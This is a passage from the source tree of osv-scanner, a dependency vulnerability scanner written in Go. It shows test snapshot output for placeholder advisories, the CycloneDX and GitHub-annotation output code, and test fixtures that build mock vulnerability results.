scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile author1/mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@ has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile mine1@1.2.3 has the following uncalled vulnerabilities: GHSA-123: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: '9'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues mine1@1.2.3 has the following uncalled vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 uncalled/unimportant vulnerability found in lockfile:/path/to/my/first/lockfile (filtered out) --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: '8.3'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@ has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: This vulnerability allows for some very scary stuff to happen - seriously,... Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.10.2-rc has the following known vulnerabilities: OSV-2: (no details available) Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile --- ================================================ FILE: internal/output/cyclonedx.go ================================================ // Package output provides functionality for printing scan results in various formats. package output import ( "errors" "io" "github.com/CycloneDX/cyclonedx-go" "github.com/google/osv-scanner/v2/internal/output/sbom" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" ) // PrintCycloneDXResults writes results to the provided writer in CycloneDX format func PrintCycloneDXResults(vulnResult *models.VulnerabilityResults, cycloneDXVersion models.CycloneDXVersion, outputWriter io.Writer) error { bomCreator := sbom.SpecVersionToBomCreator[cycloneDXVersion] resultsByPurl, errs := purl.Group(vulnResult.Results) bom := bomCreator(resultsByPurl) encoder := cyclonedx.NewBOMEncoder(outputWriter, cyclonedx.BOMFileFormatJSON) encoder.SetPretty(true) err := encoder.Encode(bom) return errors.Join(err, errors.Join(errs...)) } ================================================ FILE: internal/output/cyclonedx_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func testCycloneDXResults(t *testing.T, version models.CycloneDXVersion, testFunc func(*testing.T, func(*testing.T, outputTestCaseArgs))) { t.Helper() testFunc(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintCycloneDXResults(args.vulnResult, version, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintCycloneDXResults(t *testing.T) { t.Parallel() tests := []struct { name string version models.CycloneDXVersion testFn func(*testing.T, func(*testing.T, outputTestCaseArgs)) }{ {"CycloneDX14_WithVulnerabilities", models.CycloneDXVersion14, testOutputWithVulnerabilities}, {"CycloneDX14_WithLicenseViolations", models.CycloneDXVersion14, testOutputWithLicenseViolations}, {"CycloneDX14_WithMixedIssues", models.CycloneDXVersion14, testOutputWithMixedIssues}, {"CycloneDX15_WithVulnerabilities", models.CycloneDXVersion15, testOutputWithVulnerabilities}, {"CycloneDX15_WithLicenseViolations", models.CycloneDXVersion15, testOutputWithLicenseViolations}, {"CycloneDX15_WithMixedIssues", models.CycloneDXVersion15, testOutputWithMixedIssues}, {"CycloneDX16_WithVulnerabilities", models.CycloneDXVersion16, testOutputWithVulnerabilities}, {"CycloneDX16_WithLicenseViolations", models.CycloneDXVersion16, testOutputWithLicenseViolations}, {"CycloneDX16_WithMixedIssues", models.CycloneDXVersion16, testOutputWithMixedIssues}, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() testCycloneDXResults(t, tt.version, tt.testFn) }) } } ================================================ FILE: internal/output/form.go ================================================ package output // Form returns the singular or plural form that should be used based on the given count func Form(count int, singular, plural string) string { if count == 1 { return singular } return plural } ================================================ FILE: internal/output/form_test.go ================================================ package output_test import ( "testing" "github.com/google/osv-scanner/v2/internal/output" ) func TestForm(t *testing.T) { t.Parallel() type args struct { count int singular string plural string } tests := []struct { name string args args want string }{ { name: "", args: args{ count: 0, singular: "package", plural: "packages", }, want: "packages", }, { name: "", args: args{ count: 1, singular: "package", plural: "packages", }, want: "package", }, { name: "", args: args{ count: 2, singular: "package", plural: "packages", }, want: "packages", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := output.Form(tt.args.count, tt.args.singular, tt.args.plural); got != tt.want { t.Errorf("Form() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/output/githubannotation.go ================================================ package output import ( "fmt" "io" "path/filepath" "strings" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/table" ) // createSourceRemediationTable creates a vulnerability table which includes the fixed versions for a specific source file func createSourceRemediationTable(source models.PackageSource, groupedFixedVersions map[string][]string) (table.Writer, bool) { hasRow := false remediationTable := table.NewWriter() remediationTable.AppendHeader(table.Row{"Package", "Vulnerability ID", "CVSS", "Current Version", "Fixed Version"}) for _, pv := range source.Packages { for _, group := range pv.Groups { fixedVersions := groupedFixedVersions[source.Source.String()+":"+group.IndexString()] vulnIDs := make([]string, 0, len(group.IDs)) for _, id := range group.IDs { vulnIDs = append(vulnIDs, "https://osv.dev/"+id) } remediationTable.AppendRow(table.Row{ pv.Package.Name, strings.Join(vulnIDs, "\n"), group.MaxSeverity, pv.Package.Version, strings.Join(fixedVersions, "\n")}) hasRow = true } } return remediationTable, hasRow } func createDeprecationTable(source models.PackageSource) (table.Writer, bool) { hasRow := false deprecationTable := table.NewWriter() deprecationTable.AppendHeader(table.Row{"Package", "Current Version", "Deprecated"}) for _, pv := range source.Packages { if pv.Package.Deprecated { deprecationTable.AppendRow(table.Row{ pv.Package.Name, pv.Package.Version, pv.Package.Deprecated, }) hasRow = true } } return deprecationTable, hasRow } // PrintGHAnnotationReport prints Github specific annotations to outputWriter func PrintGHAnnotationReport(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { flattened := vulnResult.Flatten() // TODO: Also support last affected groupedFixedVersions := groupFixedVersions(flattened) workingDir := mustGetWorkingDirectory() for _, source := range vulnResult.Results { if len(source.Packages) == 0 { continue } // TODO: Support docker images var artifactPath string var err error artifactPath, err = filepath.Rel(workingDir, source.Source.Path) if err != nil { artifactPath = source.Source.Path } artifactPath = filepath.ToSlash(artifactPath) remediationTable, hasVulnTable := createSourceRemediationTable(source, groupedFixedVersions) if hasVulnTable { renderedTable := remediationTable.Render() // This is required as github action annotations must be on the same terminal line // so we URL encode the new line character renderedTable = strings.ReplaceAll(renderedTable, "\n", "%0A") // Prepend the table with a new line to look nicer in the output fmt.Fprintf(outputWriter, "::error file=%s::%s%s", artifactPath, artifactPath, "%0A"+renderedTable) } // Create and render package deprecation table deprecationTable, hasDeprecationTable := createDeprecationTable(source) if hasDeprecationTable { renderedDeprecationTable := deprecationTable.Render() renderedDeprecationTable = strings.ReplaceAll(renderedDeprecationTable, "\n", "%0A") fmt.Fprintf(outputWriter, "::error file=%s::%s%s", artifactPath, artifactPath, "%0A"+renderedDeprecationTable) } } return nil } ================================================ FILE: internal/output/githubannotation_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestPrintGHAnnotationReport_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing GH annotation output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintGHAnnotationReport_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing GH annotation output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintGHAnnotationReport_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing GH annotation output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/helpers_test.go ================================================ package output_test import ( "path/filepath" "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/dotnetpe" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/purl" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type outputTestCaseArgs struct { vulnResult *models.VulnerabilityResults } type outputTestCase struct { name string args outputTestCaseArgs } type outputTestRunner = func(t *testing.T, args outputTestCaseArgs) type pkginfo struct { Name string OSPackageName string Version string Ecosystem string Deprecated bool Commit string ImageOrigin *models.ImageOriginDetails Extractor extractor.Extractor } func resolvePURLType(eco string) string { switch eco { case "npm": return purl.TypeNPM case "NuGet": return purl.TypeNuget case "Packagist": return purl.TypeComposer } panic("unknown PURL type for ecosystem " + eco) } func newPackageInfo(source string, pi pkginfo) models.PackageInfo { info := models.PackageInfo{ Name: pi.Name, OSPackageName: pi.OSPackageName, Version: pi.Version, Ecosystem: pi.Ecosystem, Commit: pi.Commit, ImageOrigin: pi.ImageOrigin, Deprecated: pi.Deprecated, Inventory: &extractor.Package{ Name: pi.Name, Version: pi.Version, Plugins: []string{pi.Extractor.Name()}, Location: extractor.LocationFromPath(source), PURLType: resolvePURLType(pi.Ecosystem), }, } return info } func testOutputWithVulnerabilities(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) tests := []outputTestCase{ { name: "no_sources", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{}, }, }, }, { name: "one_source_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "multiple_sources_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "one_source_with_one_package,_no_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_vulnerability,_and_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}, MaxSeverity: "9"}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_just_a_commit_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_called_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_uncalled_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{ { IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }, { IDs: []string{"GHSA-123"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "GHSA-123": {Called: false}, }, }, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_vulnerability_(dev)", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", 